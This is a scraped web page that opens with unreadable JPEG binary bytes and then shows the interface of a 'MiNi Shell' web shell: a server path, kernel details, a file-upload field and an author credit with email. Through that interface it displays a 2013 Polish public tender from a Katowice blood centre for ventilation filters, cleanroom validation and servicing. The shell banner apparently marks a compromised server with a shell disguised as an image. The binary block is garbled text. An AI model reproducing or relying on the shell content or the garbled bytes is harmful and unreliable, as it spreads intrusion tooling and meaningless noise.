JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130603/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130603/97579-N-2013.html

<p class="kh_header"><b>Katowice: Dostawa materiałów eksploatacyjnych  do centrali wentylacyjno-klimatyzacyjnej oraz  usługi  serwisowe centrali wentylacyjno klimatyzacyjnej  KMW typu ZR40  
wraz  z walidacją i rewalidacją  pomieszczeń  Banku Tkanek  w  R C K i K
w  Katowicach</b><br>
<b>Numer ogłoszenia: 97579 - 2013; data zamieszczenia: 03.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalne Centrum Krwiodawstwa i Krwiolecznictwa , ul. Raciborska 15, 40-074 Katowice, woj. śląskie, tel. 032 2087300, faks 032 2516144.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rckik-katowice.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów eksploatacyjnych  do centrali wentylacyjno-klimatyzacyjnej oraz  usługi  serwisowe centrali wentylacyjno klimatyzacyjnej  KMW typu ZR40  
wraz  z walidacją i rewalidacją  pomieszczeń  Banku Tkanek  w  R C K i K
w  Katowicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa materiałów eksploatacyjnych  do centrali wentylacyjno-klimatyzacyjnej oraz  usługi  serwisowe centrali wentylacyjno klimatyzacyjnej  KMW typu ZR40 wraz z walidacją i rewalidacją  pomieszczeń  Banku Tkanek  w  R C K i K  w  Katowicach
Pakiet 1- dostawa  filtrów  do centrali  KMW typu ZR40 
Pakiet 2- - dostawa filtrów  HEPA  H13, walidacja i  rewalidacja pomieszczeń  po  wymianie  filtrów oraz świadczenie  usług  serwisowych centrali wentylacyjno klimatyzacyjnej  KMW typu ZR40.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.73.00.00-1, 39.71.70.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych warunków (wymagań) w zakresie wskazanym w art. 22 ust. 1 pkt 1 pzp.
Na potwierdzenie powyższego warunku Wykonawca przedłoży oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 pkt 1 pzp (załącznik nr 2 do SIWZ)
Certyfikat PCA lub inny wystawiony przez  jednostkę notyfikującą  uprawniający Wykonawcę do wykonywania pomiarów walidacyjnych pomieszczeń  czystości klasy  D, C, B i A  ( dotyczy pakietu 2).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca przedłoży oświadczenie o spełnianiu warunków udziału w postępowaniu z art. 22 ust. 1 pkt 2 PZP (załącznik nr 2 do SIWZ).

Wykonawca winien wykazać w wykazie zamówień wykonanych lub wykonywanych zamówienie , o którym mowa poniżej a także złożyć poświadczenia stanowiące dowód, że zamówienie zostało  wykonane lub jest wykonywane (w przypadku zamówień okresowych lub ciągłych) należycie.
 
Wykonawca winien wykazać należyte wykonanie lub wykonywanie w okresie ostatnich trzech lat przed upływem terminu składania ofert - a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednego zamówienia:
- Pod pojęciem wykonane zamówienie odpowiadające swoim rodzajem i wartością 	
zamówieniu stanowiącemu   przedmiot zamówienia  należy rozumieć zamówienie

PAKIET 1 - polegające na dostawie filtrów  do central  wentylacyjno klimatyzacyjnych KMW  o   wartości jednostkowego  zamówienia (umowy) nie mniejszej niż  25 000,00 zł netto.
PAKIET 2- polegające na wykonaniu lub wykonywaniu  co najmniej jednego   zamówienie polegającego na  dostawie filtrów  HEPA  H13,walidacji i  rewalidacji pomieszczeń  po  wymianie  filtrów oraz świadczenia usług  serwisowych centrali wentylacyjno klimatycznej  KMW typu ZR40 w pomieszczeniach klasy D,C i B         o wartości jednostkowego  zamówienia (umowy) nie mniejszej niż 300 000,00 zł netto.

Wykonawca zobowiązany jest do stosownego wypełnienia formularza wykaz zamówień wykonanych lub wykonywanych. W formularzu tym wykonawca podaje również wartość, przedmiot, daty wykonania a także podmioty, na rzecz których usługi zostały wykonane.

Przez usługę wykonaną należy rozumieć usługę już zrealizowaną tj. taką, której realizacja 
do dnia upływu terminu składania ofert zakończyła się (umowa została zrealizowana).

Przez usługę wykonywaną należy rozumieć usługę okresową lub ciągłą, będącą w trakcie realizacji tj. taką, której realizacja do dnia upływu terminu składania ofert jeszcze nie zakończyła się (umowa nadal jest realizowana)ale jej wartość zrealizowana wynosi:
Pakiet 1-  25 000,00zł
Pakiet 2-300 000,00zł  

Należyte wykonanie lub wykonywanie każdego wykazanego zamówienia (usługi) musi zostać poświadczone poprzez załączenie dowodów, że usługi zostały wykonane lub są wykonywane należycie.

Uwaga: w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych, poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert.

Zgodnie z rozporządzeniem Prezesa RM z dnia 19.02.2013 r. w sprawie rodzaju dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (poz. 231), dowodami są poświadczenia, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert.
Jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest                     w stanie uzyskać ww. poświadczenia, dowodem może być oświadczenie Wykonawcy.
Zgodnie z §9 ust. 2 cyt. rozporządzenia Prezesa RM z dnia 19.02.2013 r.,                                 w postępowaniach o udzielenie zamówienia publicznego wszczynanych w okresie 12 miesięcy od dnia wejścia w życie niniejszego rozporządzenia, Wykonawca, w miejsce ww. poświadczeń, o których mowa w §1 ust. 2 pkt 1 rozporządzenia, może przedkładać dokumenty potwierdzające należyte wykonanie usług, określone w §1 ust. 1 pkt 3 rozporządzenia Prezesa RM z dnia 30.12.2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. Nr 226, poz. 1817).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca przedłoży  oświadczenie o spełnianiu warunków udziału 
w postępowaniu z art. 22 ust. 1 pkt 3 pzp (załącznik nr 2  do SIWZ)
Wykonawca przedłoży oświadczenie, że osoby, które będą uczestniczyć  
w wykonywaniu zamówienia posiadają wymagane  uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (załącznik nr 7 do SIWZ) (dotyczy pakietu 2)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca przedłoży  oświadczenie o spełnianiu warunków udziału 
w postępowaniu z art. 22 ust. 1 pkt 3 pzp (załącznik nr 2  do SIWZ)
Wykonawca przedłoży oświadczenie, że osoby, które będą uczestniczyć  
w wykonywaniu zamówienia posiadają wymagane  uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (załącznik nr 7 do SIWZ) (dotyczy pakietu 2)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych warunków (wymagań) w zakresie wskazanym w art. 22 ust. 1 pkt  pzp.
Na potwierdzenie powyższego warunku Wykonawca przedłoży oświadczenie o spełnianiu warunków udziału w postępowaniu z art. 22 ust. 1 pkt 4 pzp (załącznik nr 2 do SIWZ).

W przypadku, gdy wykonawca polega na zdolnościach finansowych innych podmiotów, zobowiązany jest załączyć pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przez wykonawcę przy wykonywaniu zamówienia,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana  ceny  wynikła ze zmiany stawki podatku VAT wymaga   zawarcia  aneksu do umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rckik-katowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalne Centrum Krwiodawstwa i Krwiolecznictwa
ul. Raciborska 15
40-074 Katowice
SEKCJA  ZAMÓWIEŃ  PUBLICZNYCH.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.06.2013 godzina 12:00, miejsce: Regionalne Centrum Krwiodawstwa i Krwiolecznictwa
ul. Raciborska 15
40-074 Katowice
SEKRETARIAT.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PAKIET 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa  filtrów  do centrali  KMW typu ZR40  
Filtr kieszeniowy klasy G4-180 szt.
Filtr kieszeniowy klasy F7-252 szt.
Filtr kieszeniowy klasy F9-126 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.73.00.00-1, 39.71.70.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest 
- dostawa filtrów  HEPA  H13
- walidacja i  rewalidacja pomieszczeń  po  wymianie  filtrów 
- usługi  serwisowe centrali wentylacyjno klimatyzacyjnej  KMW typu ZR40 
1.  Dostawa kompletu filtrów HEPA H13 zgodnie z specyfikacją.
Filtry klasy H13 spełniające wymogi normy PN-EN 1822 - 2009. 
Każdy egzemplarz    z indywidualnym numerem i certyfikatem jakości
Rama filtru - stal ocynkowana, odporna na wilgoć i namnażanie się drobnoustrojów, nie emitująca pyłu, o odpowiedniej sztywności i odporności mechanicznej.
Medium filtracyjne - karton filtracyjny z włókna szklanego, niehigroskopijny
Uszczelnienie - pakiet uszczelniony w obudowie; rama filtru z uszczelką o grubości   8 mm, płaska,  z neoprenu.
Filtr HEPA klasa  H-13-102 szt.
Filtr HEPA klasa  H-13- 20 szt.
Filtr HEPA klasa  H-13- 2 szt.
Filtr HEPA  klasa  H-13-4 szt.
Filtr HEPA  klasa  H-13-4 szt.
Filtr HEPA  klasa  H-13-90 szt.
Filtr HEPA  klasa  H-13-12 szt.
Filtr HEPA  klasa  H-13-28 szt.
Filtr HEPA  klasa  H-13- 2 szt.
Dostawy filtrów  zgodnie z  zapotrzebowaniem zamawiającego  do 4 tygodni od  złożenia  zamówienia. 
Wykonawca dokonuje wymiany filtrów w terminie wskazanym przez Zamawiającego . Po wymianie filtrów Wykonawca zobowiązany jest  do przeprowadzenia  walidacji  i rewalidacji pomieszczeń w których były wymieniane  filtry, w terminie ustalonym  z  Zamawiającym.
2   Walidacja i  rewalidacja pomieszczeń  po   wymianie filtrów  obejmuje:
-  Mycie i dezynfekcję  pomieszczeń po wymianie filtrów.
-  Rekwalifikację Operacyjną pomieszczeń czystych Banku Tkanek obejmującą:
a)Przygotowanie dokumentacji kwalifikacji operacyjnej OQ (Protokół, Testy, Raport).
b)Przeprowadzenie testów Rekwalifikacji Operacyjnej w zakresie:
Pomiar ilości cząstek klasy czystości B, C, D  - 107 pkt. (w tym 26 pkt. w klasie B, gdzie należy pobrać próbkę o objętości 1 m3 w każdym punkcie) 
Pomiar integralności i szczelności mocowania filtrów (ilość zgodnie ze specyfikacją filtrów)
Pomiary wydajności i określenie ilości wymian - 107 pkt.
Testy regeneracji - 18 pomieszczeń
Testy dymne - 29 pomieszczeń
Pomiary nadciśnień - 29 pomieszczeń
Testy przenikalności - 29 pomieszczeń
Badania mikrobiologiczne - 35 pkt.
Pomiary temperatury i wilgotności względnej - 29 pomieszczeń
Pomiary w komorach laminarnych (obejmujący pomiary:  ilości cząstek, integralności i  szczelności mocowania filtrów, prędkości liniowej, testy równoległości strugi powietrza) - 6 komór
 
Zamawiający przewiduje  jedną  walidację  i rewalidację  pomieszczeń  w okresie obowiązywania umowy.

Wszystkie w/w pomiary należy przeprowadzić zgodnie z wymaganiami GMP oraz zgodnie                z metodologią PN EN ISO 14644 - 3.
Wykonawca posiada aktualny certyfikat PCA lub inny wystawiony  przez jednostkę notyfikującą  uprawniający do wykonywania pomiarów  walidacyjnych  pomieszczeń czystości klasy D, C, B i A. 
Certyfikat zostanie załączony  do oferty oraz do dokumentacji  walidacyjnej.

3.Usługi serwisowe 
Wykonawca zobowiązuje się do przyjmowania zgłoszeń awarii sprzętu telefonicznie ,sms-em lub za  pośrednictwem poczty elektronicznej 24 h na dobę (pracownik dyżurny pod stałym numerami telefonu komórkowego)(min.2 numery) 
 - czas przystąpienia do usunięcia awarii tj. jest do podjęcia czynności serwisowych nie później niż  2h od momentu zgłoszenia.
W ciągu 2 godzin od chwili podjęcia czynności serwisowych Wykonawca  określi rodzaj uszkodzenia oraz nazwę, ilość i wartość potrzebnych do naprawy części      i materiałów.
Czas naprawy nie powinien przekroczyć 12h- licząc od godziny podjęcia przez  Zamawiającego decyzji  odnośnie  zakresu naprawy. W wyjątkowych  przypadkach, jeżeli czas niezbędny do uzyskania przez Wykonawcę części zamiennych jest dłuższy niż 12h, Zamawiający może na pisemny wniosek Wykonawcy poparty stosownymi dokumentami wyrazić zgodę na wydłużenie okresu naprawy.
W przypadku konieczności użycia do wykonania usługi materiałów lub części zamiennych nie będących w posiadaniu Zamawiającego, ich wartość zostanie rozliczona w oparciu o fakturę wystawioną przez Wykonawcę. Do faktury załączone zostanie każdorazowo zestawienie zużytych materiałów i części zatwierdzone przez  osobę wyznaczoną przez Zamawiającego. Przed zakupem  materiałów  Wykonawca musi uzgodnić z upoważnionym przedstawicielem  Zamawiającego, ilość i rodzaj niezbędnych materiałów niezbędnych do wykonania usługi, celem ich  zatwierdzenia.

Zakres wykonywania usług:
- obsługa i serwis centrali wentylacyjno klimatyzacyjnej KMW  typ ZR40 znajdującej się na dachu budynku Banku Tkanek,
- obsługa  i serwis  BMS i RMS,
- obsługa  i serwis  okien podawczych oraz  drzwi w pomieszczeniach B.TK.,
- obsługa  i serwis  systemu dostępu do pomieszczeń Roger ,
- obsługa  i serwis  systemu łączności: wideo, komputerowej i telefonicznej,
- obsługa  i serwis  gazów (CO2,N2 i O2) oraz czynników stężenia tych gazów,
- obsługa i serwis   instalacji p.poż,
- obsługa i serwis   systemu monitoringu temperatur. 
  
Sposób rozliczania:
Rozliczenie usług następować będzie miesięcznie. Kwota ryczałtu  zawiera koszt dojazdu Wykonawcy do miejsca wykonania usług, wymianę  filtrów, walidacje i rewalidacje pomieszczeń    oraz wszystkie inne koszty wykonania usług  z wyjątkiem wartości użytych materiałów i części zamiennych.  
Wartość wszystkich dodatkowych nie wymienionych w pakiecie II użytych materiałów i części zamiennych  nie może przekroczyć   kwoty  100 tys. zł. netto w okresie obowiązywania umowy.

Na wartość  całkowitą pakietu składa się :
 - wartość  filtrów,
 - wartość ryczałtu za usługi serwisowe w tym jedna walidacje i rewalidacje pomieszczeń,
-  wartość wszystkich zakupionych ( nie będących w posiadaniu Zamawiającego) użytych  materiałów i części zamiennych. 
	
Przewidywany  okres realizacji zamówienia : 24 miesiące od daty zawarcia umowy.                                      
Wykonawca   zobowiązuje się  do   bezpłatnego  odbioru  i utylizacji  zużytych materiałów w terminie  do 3 dni  od  otrzymania  zawiadomienia  od   Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.73.00.00-1, 39.71.72.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com